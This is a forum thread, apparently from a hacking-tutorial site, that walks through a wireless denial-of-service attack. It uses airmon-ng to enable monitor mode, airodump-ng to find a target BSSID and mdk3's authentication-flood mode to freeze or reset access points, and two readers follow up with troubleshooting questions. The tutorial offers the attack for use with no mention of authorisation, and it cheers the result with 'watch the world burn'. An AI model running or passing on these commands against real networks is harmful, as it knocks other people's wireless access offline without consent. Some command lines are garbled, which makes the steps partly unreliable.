Forum Thread: How to How to Over Load a Network with MDK3

I'm going to teach you how to simply dos (Denial of service) a network. (My network card runs wlan0 your might not so use yours or this wont work.)

Step 1: Airmon-Ng

open up a terminal and type airmon-ng start wlan0 (or eth0 if your using Ethernet.) (Some times you might have to type airmon-ng check kill)

Image via wonderhowto.com

Step 2: Airodump-Ng

Next type airodump-ng wlan0 then find your Internet copy its bssid

Step 3: MDK3

If you want to watch the havoc type airodump-ng (your bssid) wlan0.
Now type mdk3 wlan0 a -e (Bssid) Done now watch the world burn.
a - Authentication DoS mode
Sends authentication frames to all APs found in range.
Too much clients freeze or reset some APs.
-e means send to this bssid

Step 4: Enjoy

Thanks for reading and have any good commands or tutorials post them in the comments I would love to read them. (Post commands or tutorials for any thing even how to eat a banana any thing is fine)

Comment or private message me if you want me to do a tutorial on any thing even how to jump.

2 Responses

Hi I am using Kali Linux on virtual box and when I use mdk3 the output is nothing I am able to see packets of mon0 on Wireshark but on mdk3 is not sending any beacon frames I've tried everything thing. Please help

I got Authorization frame successful
What should I do!?!?!

Share Your Thoughts

  • Hot
  • Active